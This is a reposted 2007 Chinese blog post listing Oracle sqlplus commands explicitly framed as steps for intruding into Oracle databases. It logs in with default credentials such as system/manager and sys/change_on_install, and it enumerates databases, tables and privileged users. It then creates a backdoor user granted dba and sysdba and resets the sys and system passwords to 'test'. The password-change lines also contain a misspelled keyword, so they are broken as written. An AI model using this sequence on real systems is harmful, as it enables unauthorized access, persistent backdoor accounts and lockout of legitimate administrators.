入侵oracle資料庫時常用的操作命令整理(轉)

ba發表於2007-08-16
入侵oracle資料庫時常用的操作命令整理(轉)[@more@]1、su – oracle 不是必需,適合於沒有DBA密碼時使用,可以不用密碼來進入sqlplus介面。
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
3、SQL>connect / as sysdba ;(as sysoper)或
connect internal/oracle AS SYSDBA ;(scott/tiger)
conn sys/change_on_install as sysdba;
4、SQL>startup; 啟動資料庫例項
5、 檢視當前的所有資料庫: select * from v$database;
select name from v$database;
desc v$databases; 檢視資料庫結構欄位
7、怎樣檢視哪些使用者擁有SYSDBA、SYSOPER許可權:
SQL>select * from V_$PWFILE_USERS;
Show user;檢視當前資料庫連線使用者
8、進入test資料庫:database test;
9、檢視所有的資料庫例項:select * from v$instance;
如:ora9i
10、檢視當前庫的所有資料表:
SQL> select TABLE_NAME from all_tables;
select * from all_tables;
SQL> select table_name from all_tables where table_name like '%u%';

TABLE_NAME
------------------------------
_default_auditing_options_

11、檢視錶結構:desc all_tables;
12、顯示CQI.T_BBS_XUSER的所有欄位結構:
desc CQI.T_BBS_XUSER;
13、獲得CQI.T_BBS_XUSER表中的記錄:
select * from CQI.T_BBS_XUSER;
14、增加資料庫使用者:(test11/test)
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
15、使用者授權:
grant connect,resource,dba to test11;
grant sysdba to test11;
commit;
16、更改資料庫使用者的密碼:(將sys與system的密碼改為test.)
alter user sys indentified by test;
alter user system indentified by test;

來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/10617731/viewspace-961820/,如需轉載,請註明出處,否則將追究法律責任。

相關文章